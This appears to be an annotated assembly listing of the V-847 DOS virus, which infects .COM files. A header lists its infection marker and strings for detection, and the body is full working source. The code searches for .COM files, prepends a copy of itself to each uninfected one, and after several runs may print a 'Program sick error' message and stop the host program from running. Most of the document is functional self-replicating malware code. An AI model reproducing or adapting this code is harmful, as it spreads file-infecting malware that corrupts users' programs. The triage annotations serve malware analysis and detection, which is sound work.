📄 c-847.asm
;-----------------------------------------------------------------------
; V-847: commented listing of a DOS .COM file infector.
; 16-bit real mode, MASM syntax; .radix 16 makes bare numbers hexadecimal.
;
; What the code below does, in order:
;   1. Increments [counter], then copies virlen bytes from start to
;      offset 0 of the segment 1000 paragraphs above CS.
;   2. Points the DTA at newdta and walks every '*.COM' match (the
;      search string carries no path), opening each file read/write.
;   3. Reads the file to `buffer` in the upper segment. If the word at
;      newid is not 'VI', seeks to 0 and writes [eof] bytes starting at
;      offset 0 of that segment: virus copy + gap + original file.
;   4. Restores the DTA. When counter >= 5 and the tick word at
;      0040:006C is odd, prints `message` and exits via int 20, so the
;      host program is not run.
;   5. Otherwise copies transf..endcode to ES:0, jumps there, moves the
;      host image down to offset 100 and far-jumps to it.
;
; Points useful for detection and triage (all taken from this listing):
;   - marker word 'VI' (ident) stored directly after the entry jump
;   - strings '*.COM' and 'Program sick error:Call doctor or buy PIXEL
;     for cure description'
;   - a write puts `buffer` bytes in front of the host; by the equates
;     below buffer = virlen + 200
;   - no int 21 call in this listing reads or sets file date/time or
;     attributes
;-----------------------------------------------------------------------

        page    ,132
        name    V847
        title   The V-847 virus
        .radix  16

code    segment
        assume  cs:code,ds:code
        org     100

timer   equ     6C              ; offset of the tick word read via segment 40
olddta  equ     80              ; DTA address restored at `done`
virlen  equ     offset endcode - offset start
smalcod equ     offset endcode - offset transf
buffer  equ     offset endcode + 100    ; where each candidate file is read
newdta  equ     offset endcode + 10     ; private DTA used during the search
fname   =       newdta + 1E             ; name field inside that DTA
virlenx =       offset endcode - offset start
; newid = ident + virlenx + 100 = (ident - start) + buffer, i.e. the place
; where the ident word lands in a file image read to `buffer`.
newid   =       offset ident + virlenx + 100

start:
        jmp     virus

ident   dw      'VI'            ; infection marker compared at [newid]
counter db      0               ; incremented on every run, copied with the body
allcom  db      '*.COM',0
vleng   dw      44F             ;Unused
progbeg dd      10000h          ; far pointer, overwritten before use at progok
eof     dw      ?
handle  dw      ?

virus:
        mov     ax,cs           ;Move program code
        add     ax,1000         ; 64K bytes forward
        mov     es,ax
        inc     [counter]       ; bumped before the copy, so the copy carries it
        mov     si,offset start
        xor     di,di
        mov     cx,virlen
        rep     movsb

        mov     dx,newdta       ;Set new Disk Transfer Address
        mov     ah,1A           ;Set DTA
        int     21
        mov     dx,offset allcom        ;Search for '*.COM' files
        mov     cx,110b         ;Normal, Hidden or System
        mov     ah,4E           ;Find First file
        int     21
        jc      done            ;Quit if none found

; Per-file loop. DS is switched to the upper segment (ES) for the read,
; the marker test and the write, and restored to CS at `close`.
mainlp:
        mov     dx,offset fname
        mov     ax,3D02         ;Open file in Read/Write mode
        int     21
        mov     [handle],ax     ;Save handle (carry from the open is not tested)
        mov     bx,ax
        push    es
        pop     ds
        mov     dx,buffer
        mov     cx,0FFFF        ;Read all bytes
        mov     ah,3F           ;Read from handle
        int     21              ;Bytes read in AX
        add     ax,buffer
        mov     cs:[eof],ax     ;Save pointer to the end of file

        db      3E              ;Force DS: prefix
        cmp     [newid],'VI'    ;Infected?
        je      close           ;Go find next file

        xor     cx,cx           ;Go to file beginning
        mov     dx,cx
        mov     bx,cs:[handle]
        mov     ax,4200         ;LSEEK from the beginning of the file
        int     21
        jc      close           ;Leave this file if error occurs

        ; DS:0 is the copy made at `virus`; [eof] = bytes read + buffer,
        ; so the write covers the copy, the gap up to `buffer`, and the file.
        mov     dx,0            ;Write the whole code (virus+file)
        mov     cx,cs:[eof]     ; back onto the file
        mov     bx,cs:[handle]
        mov     ah,40           ;Write to handle
        int     21

close:
        mov     bx,cs:[handle]
        mov     ah,3E           ;Close the file
        int     21
        push    cs
        pop     ds              ;Restore DS
        mov     ah,4F           ;Find next matching file
        mov     dx,newdta
        int     21
        jc      done            ;Exit if all found
        jmp     mainlp          ;Otherwise loop again

done:
        mov     dx,olddta       ;Restore old Disk Transfer Address
        mov     ah,1A           ;Set DTA
        int     21

        ; Payload gate: needs counter >= 5 and an odd low tick word.
        cmp     [counter],5     ;If counter goes above 5,
        jb      progok          ; the program becomes "sick"
        mov     ax,40
        mov     ds,ax           ;Get the system timer value
        mov     ax,word ptr ds:[timer]
        push    cs
        pop     ds              ;Restore DS
        and     ax,1            ;At random (if timer value is odd)
        jz      progok          ; display the funny message
        mov     dx,offset message
        mov     ah,9            ;Print string
        int     21
        int     20              ;Terminate program

message db      'Program sick error:Call doctor or '
        db      'buy PIXEL for cure description',0A,0Dh,'$'

; Hand-over to the host: the tail transf..endcode is copied to ES:0 and
; run from there, so it can overwrite the code at offset 100 in DS.
progok:
        mov     si,offset transf        ;Move this part of code
        mov     cx,smalcod      ;Code length
        xor     di,di           ;Move to ES:0
        rep     movsb           ;Do it

        xor     di,di           ;Clear DI
        mov     word ptr cs:[progbeg],0
        mov     word ptr cs:[progbeg+2],es      ;Point progbeg at program start
        jmp     cs:[progbeg]    ;Jump at program start

transf:
        push    ds
        pop     es
        mov     si,buffer+100   ; host image position in a file written by mainlp
        cmp     [counter],1
        jne     skip
        sub     si,200          ; counter == 1: SI = endcode, the dummy program below
skip:
        mov     di,offset start
        mov     cx,0FFFF        ;Restore original program's code
        sub     cx,si
        rep     movsb

        ; Build a far pointer DS:start in the scratch copy and enter the host.
        mov     word ptr cs:[start],offset start
        mov     word ptr cs:[start+2],ds
        jmp     dword ptr cs:[start]    ;Jump to program start

endcode label   byte

        int     20              ;Dummy program
        int     20              ;???

        dw      0               ;Unused

code    ends
        end     start